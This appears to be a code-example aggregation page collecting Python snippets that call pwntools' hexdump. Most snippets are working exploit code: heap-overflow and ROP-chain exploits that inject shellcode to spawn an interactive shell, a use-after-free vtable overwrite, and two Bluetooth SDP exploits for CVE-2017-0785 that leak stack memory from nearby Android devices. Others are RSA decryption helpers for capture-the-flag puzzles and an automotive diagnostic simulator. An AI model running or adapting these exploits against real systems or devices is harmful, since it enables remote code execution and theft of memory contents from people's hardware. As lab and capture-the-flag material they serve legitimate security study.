Beispiel #1
0
def attack():
    pr = pwn.process([remote_binary], cwd=os.path.dirname(remote_binary))
    try:
        elf = pwn.ELF(remote_binary, False)
        payload = pwn.p32(elf.got["exit"] - 12)

        pr.readline()
        fullname = int(pr.readline())

        # fullname
        shellcode = pwn.asm(
            "jmp skip;" + "nop;" * 100 +
            "{} skip: nop;".format(pwn.shellcraft.i386.linux.sh())).ljust(672 -
                                                                          4)
        shellcode += pwn.p32(73).ljust(72)
        shellcode += pwn.p32(0x101)
        print(pwn.hexdump(shellcode))
        print("shellcode length:", len(shellcode))
        pr.writelineafter("Input fullname\n", shellcode)

        # lastname
        payload = pwn.p32(0x101)  # set size to 0
        payload += pwn.p32(elf.got["exit"] - 12) + pwn.p32(fullname + 8)
        payload = payload.ljust(256 - 4)
        payload = "A" * (256 - 4) + payload + pwn.p32(0x101)  # set size to 0

        print(pwn.hexdump(payload))
        print("payload length:", len(payload))
        pr.writelineafter("Input lastname\n", payload)
        pr.interactive()
    finally:
        pr.close()
Beispiel #2
0
def test():
    from Crypto.Util.number import bytes_to_long, long_to_bytes
    import base64
    ct = base64.b64decode('R0vRTQQAafW+rjLu4+vd5FOtFRJJDFfk9R1bsilaMXZ/qaVb/P0gIHOWL9pHZembt17LPq+iyzYroUOnRoz3Bd/1svTAs9ucljfcZ7i65zpwyLfn2J+24KHtFssXRVOO/V0R/8DydJsFmjyhzvkzGx4Flr5XMREt+T/4ZeeNYTA=')
    p = 9733382803370256893136109840971590971460094779242334919432347801491641617443615856221168611138933576118196795282443503609663168324106758595642231987245583
    q = 9733382803370256893136109840971590971460094779242334919432347801491641617443615856221168611138933576118196795282443503609663168324106758595642231987246769
    e = 65537
    key = generate_key_from_pqe(p, q, e)
    ct = bytes_to_long(ct)
    pt = rsa_decrypt(ct, key.d, key.N)
    print hexdump(long_to_bytes(pt))
Beispiel #3
0
    def callb(self, r):
        while True:
            client_input = r.recvrepeat(self.wait_for_response)
            if len(client_input) < 1:
                sleep(0.1)
                continue
            pwn.info("Recieved: " + pwn.hexdump(client_input))
            pk = HSZFPacket()
            pk.parse(client_input)
            if pk.identifier == Identifier.REQUEST:
                uds_data = pk.uds_packet.get_full_packet()
                if len(uds_data) < 1:
                    data = 0x00
                else:
                    data = unpack_all(uds_data)
                # ECU identifier
                if pk.reciever != 0x37 or pk.sender != 0x13:
                    response_data = self.sid_switch(0x33)(0x33, r, pk)
                else:
                    response_data = self.sid_switch(data)(data, r, pk)
                response = HSZFPacket()
                response.create(response_data, pk.reciever, pk.sender)
                pwn.info("Sending the response: " +
                         pwn.hexdump(response.get_full_packet()))
                r.send(response.get_full_packet())

                if data == 0x22F100:
                    pwn.info("--Got Session Request--\n" +
                             pwn.hexdump(pk.uds_packet.get_full_packet()))
                    response = HSZFPacket()
                    response.create(b'\x62\xF1\x00\x01\x81\x00\x01',
                                    pk.reciever, pk.sender)
                    pwn.info("Sending the response: " +
                             pwn.hexdump(response.get_full_packet()))
                    r.send(response.get_full_packet())

            r.clean_and_log()
Beispiel #4
0
def main():
    target_bd_addr = args['BD_ADDR']

    l2cap_mtu = 50

    sock = BluetoothSocket(L2CAP)
    set_l2cap_mtu(sock, l2cap_mtu)

    sock.connect((target_bd_addr, PSM_SDP))

    print('Sending the first SDP_SERVICE_SEARCH_REQ PDU')
    params = {
        'ServiceSearchPattern': b'\x35\x03\x19\x01\x00',
        'MaximumServiceRecordCount': 0xFFFF,
        'ContinuationState': b'\x00'
    }
    sock.send(sdp_service_search_req(params))
    sdp_service_search_rsp = sock.recv(l2cap_mtu)
    
    info_len = sdp_service_search_rsp[-3]
    if info_len != ANDROID_CONT_STATE_INFO_LEN:
        print(sdp_service_search_rsp[-3])
        print('Invalid continuation state received.')
        sys.exit(1)

    stack = b''
    for i in range(1, 30): # 越界读的次数太多会导致目标蓝牙崩溃
        print('Sending packet %d' % i)
        params = {
            'ServiceSearchPattern': b'\x35\x03\x19\x01\x00',
            'MaximumServiceRecordCount': 0x0001,
            'ContinuationState': sdp_service_search_rsp[-3:]
        }
        sock.send(sdp_service_search_req(params))
        sdp_service_search_rsp = sock.recv(l2cap_mtu)
        
        # Leaked info is in ServiceRecordHandleList field
        stack += sdp_service_search_rsp[9:-3]

    sock.close()

    print(hexdump(stack))
    if len(stack) > 20:
        print('CVE-2017-0785')
Beispiel #5
0
def decrypt(r1, r2, r3, e, N, ct):
    d = d_from_primes_e([r1, r2, r3], e)
    pt = rsa_decrypt(ct, d, N)
    print "x:", pt
    print hexdump(long_to_bytes(pt))
    return pt
Beispiel #6
0
from rsautils import *
from generate_pem_from_pqe import generate_key_from_pqe


def test():
    from Crypto.Util.number import bytes_to_long, long_to_bytes
    import base64
    ct = base64.b64decode('R0vRTQQAafW+rjLu4+vd5FOtFRJJDFfk9R1bsilaMXZ/qaVb/P0gIHOWL9pHZembt17LPq+iyzYroUOnRoz3Bd/1svTAs9ucljfcZ7i65zpwyLfn2J+24KHtFssXRVOO/V0R/8DydJsFmjyhzvkzGx4Flr5XMREt+T/4ZeeNYTA=')
    p = 9733382803370256893136109840971590971460094779242334919432347801491641617443615856221168611138933576118196795282443503609663168324106758595642231987245583
    q = 9733382803370256893136109840971590971460094779242334919432347801491641617443615856221168611138933576118196795282443503609663168324106758595642231987246769
    e = 65537
    key = generate_key_from_pqe(p, q, e)
    ct = bytes_to_long(ct)
    pt = rsa_decrypt(ct, key.d, key.N)
    print hexdump(long_to_bytes(pt))

if __name__ == "__main__":
    import sys
    if len(sys.argv) == 1:
        print "Usage: %s <p> <q> <e> <ct>" % sys.argv[0]
        print "       %s -test" % sys.argv[0]
    elif sys.argv[1] == "-test":
        test()
    else:
        convert = lambda x: int(x, 16) if x[:2] == "0x" else int(x)
        args = [convert(x) for x in sys.argv[1:]]
        key = generate_key_from_pqe(*tuple(args))
        pt = rsa_decrypt(ct, key['d'], key['N'])
        print hexdump(pt)
Beispiel #7
0
+8 will contain give_shell.

We need to add our payload two times, since else only the woman instance is overwritten, and
calling man will crash.
"""

pwn.context.terminal = ["tmux", "splitw", "-h"]
exe = pwn.context.binary = pwn.ELF('./uaf')

random_file = "/tmp/%s" % pwn.util.fiddling.randoms(10)
size_of_new = 8
payload_length = size_of_new
address_of_virtual_address_table = 0x401570
payload = pwn.p64(address_of_virtual_address_table -
                  8) + b'a' * (size_of_new - 8)
pwn.debug(pwn.hexdump(payload))

gdbscript = '''
# Before "delete m;"
break *0x00401082

# before "m->introduce();"
break *0x00400fe2

# before "new"
break *0x00401020
continue
'''

if pwn.args.GDB:
    pwn.write('/tmp/payload', payload)
Beispiel #8
0
arch = amd64

if __name__ == "__main__":
    # pop the first gadget of the stack
    chain = StartGadget(arch)
    # create a rop chain of length 7 using all the gadgets in `gadgets`
    chain = chain >> SMTGadget(arch, gadgets, levels=7)
    # add some constraints for doing a function call
    chain = chain >> amd64Call(
        u64("RIP=FUNC"),  # what to call?
        u64("RDI=ARG1"),  # first argument
        u64("RSI=ARG2"),  # secound argument 
        u64("RDX=ARG3")  # ...
    )
    # check if this is possible, and generated a model of it
    model = chain.model()
    ins, outs, m = model

    #how did we do it?
    if "gadgets" in outs:
        print "Gadgets used:"
        for gadget in outs["gadgets"]:
            addr = int(str(m.eval(gadget)))
            gad = amd64_gadgets[addr]
            print "0x%x: %s" % (addr, disasm(arch, addr, gad.code))

    # print the final result
    print "Ropchain:"
    ropchain = chain.use(model=model)
    print hexdump(ropchain)
Beispiel #9
0
        val = rop_chain[x * 4:(x + 1) * 4]
        val = pwn.u32(val)
        write_stack_offset(x + addr, val)


mprotect_addr = exe.symbols['mprotect']

io = start()
io.recvuntil("=== Welcome to SECPROG calculator ===\n")
stack_addr = get_absolute_stack_address_below_main()
stack_addr_mod_pagesize = stack_addr - (stack_addr % 4096)
pwn.success("Stack absolute address is 0x%08x" % stack_addr)
pwn.success("Stack absolute address mod pagesize is 0x%08x" %
            stack_addr_mod_pagesize)
rop_chain = (
    pwn.p32(mprotect_addr) +  # return from calc, go to mprotect
    pwn.p32(stack_addr + 16)
    +  # return address after mprotect, go to shellcode
    pwn.p32(stack_addr_mod_pagesize) +  # mprotect param: addr
    pwn.p32(4096) +  # mprotect param: page size
    pwn.p32(7) +  # mprotect param: rwx
    pwn.asm(pwn.shellcraft.sh()
            )  # shellcode after stack has been marked executable
)

pwn.debug("ROP chain:\n%s" % pwn.hexdump(rop_chain))

write_rop_chain_to_addr(main_ret_address_offset, rop_chain)
io.sendline()
io.interactive()
Beispiel #10
0
    # Try to initiate a connection to the target
    try:
        sock.connect((args.TARGET, 1))
    except bt.btcommon.BluetoothError as e:
        pwn.log.failure("Connection failed: %s" % e.message)
        sys.exit(1)

    # Send the first package for the long service without continuation state
    p.status('Sending packet 0')
    sock.send(construct_packet(SDP_SERVICE_LONG, '\x00'))
    data = sock.recv(MTU)

    if data[-3] != '\x02':
        pwn.log.failure('Invalid continuation state received.')
        sys.exit(1)

    leaked = str()
    # Send packages to the short service with the received continuation state of
    # the long service. This results in a state confusion and a buffer underflow.
    # The underflow causes the remote device to send data from the stack we
    # should not be able to see
    for i in range(1, args.count):
        p.status('Sending packet %d' % i)
        sock.send(construct_packet(SDP_SERVICE_SHORT, data[-3:]))
        data = sock.recv(MTU)
        leaked += data[9:-3]

    sock.close()
    p.success('Done')
    print pwn.hexdump(leaked, skip=not args.no_skip_repeat)